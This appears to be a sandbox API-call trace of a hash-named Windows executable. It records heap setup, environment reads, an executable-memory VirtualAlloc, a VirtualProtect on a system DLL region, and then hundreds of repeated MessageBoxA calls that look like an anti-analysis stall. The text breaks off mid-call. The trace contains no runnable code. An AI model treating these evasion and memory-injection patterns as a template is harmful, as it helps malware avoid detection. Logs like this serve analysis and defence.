0x7d17b8 [0117.732] RtlInitializeSListHead (in: ListHead=0x54c3c0 | out: ListHead=0x54c3c0) [0117.732] GetLastError () returned 0x0 [0117.732] SetLastError (dwErrCode=0x0) [0117.732] GetEnvironmentStringsW () returned 0x7db3d8* [0117.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0117.732] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x50d) returned 0x7dbe00 [0117.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x7dbe00, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0117.812] FreeEnvironmentStringsW (penv=0x7db3d8) returned 1 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x90) returned 0x7d06c8 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1f) returned 0x7caa20 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e) returned 0x7cfb50 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x37) returned 0x7d5428 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x3c) returned 0x7d2b48 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x31) returned 0x7d5968 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7ca1e8 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x24) returned 0x7cf558 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xd) returned 0x7d9188 [0117.812] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1d) returned 0x7caa48 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x31) returned 0x7d54a8 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x15) returned 0x7db648 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x17) returned 0x7db4c8 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xe) returned 0x7d9140 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x69) returned 0x7cff20 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x3e) returned 0x7d2830 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1b) returned 0x7cab60 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1d) returned 0x7cac50 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x48) returned 0x7c6b70 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x12) returned 0x7db608 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x18) returned 0x7db7e8 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1b) returned 0x7caa98 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x24) returned 0x7cf588 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x29) returned 0x7cfbc0 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1e) returned 0x7cab88 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x6b) returned 0x7c6bf8 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x17) returned 0x7db668 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xf) returned 0x7d9158 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x16) returned 0x7db688 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2a) returned 0x7cfc30 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x29) returned 0x7cfca0 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x12) returned 0x7db6c8 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x21) returned 0x7dc6a0 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x16) returned 0x7db588 [0117.813] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x22) returned 0x7dc370 [0117.814] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x12) returned 0x7db548 [0117.814] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dbe00 | out: hHeap=0x7c0000) returned 1 [0117.815] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x77420000 [0117.880] GetProcAddress (hModule=0x77420000, lpProcName="SleepConditionVariableCS") returned 0x77557f60 [0117.880] GetProcAddress (hModule=0x77420000, lpProcName="WakeAllConditionVariable") returned 0x77898d70 [0117.881] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x800) returned 0x7dc720 [0117.888] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.888] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x407f5e) returned 0x0 [0117.963] GetProcessHeap () returned 0x7c0000 [0117.963] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0117.963] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0117.966] GetCurrentThreadId () returned 0xd3c [0117.966] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0117.966] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0117.966] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe\" " [0117.966] CoInitialize (pvReserved=0x0) returned 0x0 [0118.813] VirtualAlloc (lpAddress=0x0, dwSize=0xa00000, flAllocationType=0x3000, flProtect=0x40) returned 0x2150000 [0118.814] VirtualProtect (in: lpAddress=0x756bfec0, dwSize=0x100, flNewProtect=0x40, lpflOldProtect=0x19feb4 | out: lpflOldProtect=0x19feb4*=0x20) returned 1 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.824] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.825] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.826] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.827] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.828] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.829] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.830] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.831] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.832] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.833] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.834] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.835] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.836] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.855] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0118.856] MessageBoxA 